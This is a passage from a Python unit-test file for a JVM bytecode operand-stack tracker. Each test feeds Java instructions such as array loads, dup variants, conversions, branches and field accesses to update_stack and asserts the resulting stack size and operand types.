stack.update_stack("astore_3")
assert len(stack._stack) == 0
def test_athrow():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("athrow")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_baload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Byte.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("baload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Byte
def test_bastore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Byte.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_0")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("bastore")
assert len(stack._stack) == 0
def test_bipush():
stack = Stack()
stack.update_stack("bipush", 1)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_caload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Char.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("caload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Char
def test_castore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Char.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_0")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("castore")
assert len(stack._stack) == 0
def test_checkcast():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("checkcast", cf.constants.create_class("java/lang/String"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_d2f():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("d2f")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_d2i():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("d2i")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_d2l():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("d2l")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_dadd():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Double
stack.update_stack("dadd")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_daload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Double.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("daload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_dastore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Double.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("dconst_0")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Double
stack.update_stack("dastore")
assert len(stack._stack) == 0
def test_dcmpg():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Double
stack.update_stack("dcmpg")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_dcmpl():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Double
stack.update_stack("dcmpl")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_dconst():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack = Stack()
stack.update_stack("dconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_ddiv():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Double
stack.update_stack("ddiv")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_dload():
stack = Stack()
stack.update_stack("dload", 0)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack = Stack()
stack.update_stack("dload_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack = Stack()
stack.update_stack("dload_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack = Stack()
stack.update_stack("dload_2")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack = Stack()
stack.update_stack("dload_3")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_dmul():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Double
stack.update_stack("dmul")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_dneg():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dneg")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_drem():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Double
stack.update_stack("drem")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_dreturn():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dreturn")
assert len(stack._stack) == 0
def test_dstore():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dstore", 0)
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dstore_0")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dstore_1")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dstore_2")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dstore_3")
assert len(stack._stack) == 0
def test_dsub():
stack = Stack()
stack.update_stack("dconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
stack.update_stack("dconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Double
stack.update_stack("dsub")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_dup():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("dup")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
def test_dup_x1():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("dup_x1")
assert len(stack._stack) == 3
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
def test_dup_x2():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("dup_x2")
assert len(stack._stack) == 4
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
assert stack._stack[3] == OperandType.Integer
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("dup_x2")
assert len(stack._stack) == 3
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Long
assert stack._stack[2] == OperandType.Integer
def test_dup2():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("dup2")
assert len(stack._stack) == 4
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
assert stack._stack[3] == OperandType.Integer
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("dup2")
assert len(stack._stack) == 2
assert stack._stack[0] == OperandType.Long
assert stack._stack[1] == OperandType.Long
def test_dup2_x1():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("dup2_x1")
assert len(stack._stack) == 5
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
assert stack._stack[3] == OperandType.Integer
assert stack._stack[4] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("lconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("dup2_x1")
assert len(stack._stack) == 3
assert stack._stack[0] == OperandType.Long
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Long
def test_dup2_x2():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("iconst_3")
assert len(stack._stack) == 4
assert stack._stack[3] == OperandType.Integer
stack.update_stack("dup2_x2")
assert len(stack._stack) == 6
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
assert stack._stack[3] == OperandType.Integer
assert stack._stack[4] == OperandType.Integer
assert stack._stack[5] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("lconst_1")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Long
stack.update_stack("dup2_x2")
assert len(stack._stack) == 4
assert stack._stack[0] == OperandType.Long
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
assert stack._stack[3] == OperandType.Long
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("dup2_x2")
assert len(stack._stack) == 5
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Long
assert stack._stack[3] == OperandType.Integer
assert stack._stack[4] == OperandType.Integer
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("dup2_x2")
assert len(stack._stack) == 3
assert stack._stack[0] == OperandType.Long
assert stack._stack[1] == OperandType.Long
assert stack._stack[2] == OperandType.Long
def test_f2d():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("f2d")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_f2i():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("f2i")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_f2l():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("f2l")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_fadd():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fadd")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_faload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Float.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("faload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_fastore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Float.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("fconst_0")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Float
stack.update_stack("fastore")
assert len(stack._stack) == 0
def test_fcmpg():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fcmpg")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_fcmpl():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fcmpl")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_fconst():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fconst_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Float
def test_fdiv():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fdiv")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_fload():
stack = Stack()
stack.update_stack("fload_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fload_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fload_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Float
stack.update_stack("fload_3")
assert len(stack._stack) == 4
assert stack._stack[3] == OperandType.Float
def test_fmul():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fmul")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_fneg():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fneg")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_frem():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("frem")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_freturn():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("freturn")
assert len(stack._stack) == 0
def test_fstore():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fstore_0")
assert len(stack._stack) == 0
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fstore_1")
assert len(stack._stack) == 0
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fstore_2")
assert len(stack._stack) == 0
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fstore_3")
assert len(stack._stack) == 0
def test_fsub():
stack = Stack()
stack.update_stack("fconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack.update_stack("fconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Float
stack.update_stack("fsub")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_getfield():
stack = Stack()
stack.update_stack("new", cf.constants.create_class("java/lang/String"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("getfield", cf.constants.create_field_ref("java/lang/System", "out", "Ljava/io/PrintStream;"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_getstatic():
stack = Stack()
stack.update_stack("getstatic", cf.constants.create_field_ref("java/lang/System", "out", "Ljava/io/PrintStream;"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_goto():
stack = Stack()
stack.update_stack("goto", Label("label"))
assert len(stack._stack) == 0
def test_goto_w():
stack = Stack()
stack.update_stack("goto_w", Label("label"))
assert len(stack._stack) == 0
def test_i2b():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("i2b")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Byte
def test_i2c():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("i2c")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Char
def test_i2d():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("i2d")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_i2f():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("i2f")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_i2l():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("i2l")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_i2s():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("i2s")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Short
def test_iadd():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iadd")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_iaload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Integer.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iaload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_iand():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iand")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_iastore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Integer.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("iastore")
assert len(stack._stack) == 0
def test_iconst():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_2")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_3")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_4")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_5")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_idiv():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("idiv")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_if_acmp():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("aconst_null")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Reference
stack.update_stack("if_acmpeq")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("aconst_null")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Reference
stack.update_stack("if_acmpne")
assert len(stack._stack) == 0
def test_if_icmp():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("if_icmpeq")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("if_icmpne")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("if_icmplt")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("if_icmpge")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("if_icmpgt")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("if_icmple")
assert len(stack._stack) == 0
def test_if():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("ifne")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("ifeq")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iflt")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("ifge")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("ifgt")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("ifle")
assert len(stack._stack) == 0
def test_ifnonnull():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("ifnonnull")
assert len(stack._stack) == 0
def test_ifnull():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("ifnull")
assert len(stack._stack) == 0
def test_iinc():
stack = Stack()
stack.update_stack("iinc", 0, 0)
assert len(stack._stack) == 0
def test_iload():
stack = Stack()
stack.update_stack("iload", 0)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iload_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iload_2")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("iload_3")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_imul():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("imul")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_ineg():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("ineg")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_instanceof():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("instanceof", cf.constants.create_class("java/lang/String"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Boolean
def test_invokedynamic():
method_handle = cf.constants.create_method_handle(
MethodHandleKind.INVOKE_STATIC,
"java/lang/invoke/StringConcatFactory",
"makeConcatWithConstants",
"(Ljava/lang/invoke/MethodHandles$Lookup;"
"Ljava/lang/String;Ljava/lang/invoke/MethodType;Ljava/lang/String;[Ljava/lang/Object;)"
"Ljava/lang/invoke/CallSite;"
)
cf.bootstrap_methods.append(
BootstrapMethod(method_handle.index, (cf.constants.create_string("\1=\1\0").index,)))
make_concat_with_constants = cf.constants.create_invoke_dynamic(
len(cf.bootstrap_methods) - 1,
"makeConcatWithConstants",
"(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;"
)
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("aconst_null")
assert len(stack._stack) == 2
